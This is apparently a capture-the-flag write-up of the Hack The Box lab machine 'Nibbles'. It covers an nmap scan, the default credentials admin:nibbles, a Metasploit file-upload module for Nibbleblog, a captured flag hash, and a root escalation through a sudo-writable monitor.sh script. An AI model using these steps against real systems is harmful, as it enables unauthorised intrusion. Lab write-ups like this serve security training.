Writeup: Hack The Box - Machines - Nibbles

Description

  • Name: Nibbles
  • IP: 10.10.10.75
  • Author: mrb3n
  • Difficulty: Easy

Discovery

nmap -sV -sC -Pn 10.10.10.75 -p 1-65535 -T5

1
2
3
4
5
6
7
8
9
10
11
12
13
Nmap scan report for 10.10.10.75
Host is up (0.032s latency).
Not shown: 65075 closed ports, 458 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Pwn

In the HTML source of the page of the web server is possible to see: <!-- /nibbleblog/ directory. Nothing interesting here! -->

Poking around we found the admin login page http://10.10.10.75/nibbleblog/admin.php and a possible exploit for the web application

Trying some default login standard/noob combinations we managed to get a tuple working: admin:nibbles.

So with metasploit exploit/multi/http/nibbleblog_file_upload we got a session:

The user flag was is in /home/nibbler/user.txt: b02ff32bb332deba49eeaed21152c8d8.

The system flag is in /root/root.txt but someone asked for a reset for the machine => session lost; and someone changed the default credentials.

Using the tool LinEnum to see some informations for a local privesc we discovered that nibbler can run /home/nibbler/personal/stuff/monitor.sh as root without password.

So creating a monitor.sh in the right path with the content echo "cat /root/root.txt > /tmp/asd" > monitor.sh we got the flag.